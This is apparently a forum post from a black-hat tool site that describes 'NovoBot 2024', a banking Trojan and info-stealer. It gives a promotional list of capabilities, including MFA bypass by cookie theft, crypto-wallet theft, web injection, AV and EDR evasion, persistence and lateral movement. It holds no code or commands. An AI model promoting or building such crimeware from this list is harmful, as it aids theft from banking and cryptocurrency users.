7 hours ago
![[Image: NovoBot-2024.png]](https://blackhattool.com/wp-content/uploads/2025/07/NovoBot-2024.png)
NovoBot 2024 is an advanced banking Trojan and info-stealer that has evolved from earlier versions like Zeus and IcedID. This malware primarily targets online banking systems, cryptocurrency wallets, and financial applications, using sophisticated techniques to bypass multi-factor authentication (MFA) and steal credentials. Distributed through phishing campaigns, malicious ads, and exploit kits, NovoBot is capable of session hijacking, form grabbing, and injecting malicious scripts into banking websites to manipulate transactions.
Detailed Features of NovoBot1. Advanced Financial Data Theft
- Web Injection Framework: Modifies banking pages in real-time to steal credentials and inject fake payment forms.
- Session Hijacking: Steals active banking cookies to bypass MFA (2FA, OTP, biometrics).
- Cryptocurrency Targeting: Scans for and steals MetaMask, Trust Wallet, and Ledger Live credentials.
- Form Grabbing: Logs keystrokes and auto-fill data from browsers (Chrome, Firefox, Edge).
- Process Hollowing: Injects malicious code into legitimate processes (explorer.exe, svchost.exe).
- Polymorphic Code: Changes its signature to evade AV/EDR detection.
- Sandbox & VM Detection: Checks for analysis environments and remains dormant if detected.
- Registry Modifications: Creates auto-run entries for persistence.
- DLL Side-Loading: Abuses legitimate signed applications to load malicious payloads.
- Lateral Movement: Uses RDP, SMB exploits, and Mimikatz to spread across networks.
- Encrypted C2 Channels: Uses HTTPS, DNS tunneling, or Tor for stealth.
- Modular Updates: Downloads additional payloads (keyloggers, ransomware) as needed.
- Botnet Integration: Can be part of a larger banking botnet (e.g., TrickBot, QakBot).
- Android Version: Targets mobile banking apps via fake APK downloads.
- MacOS Compatibility: A Rare but emerging variant for Apple users.
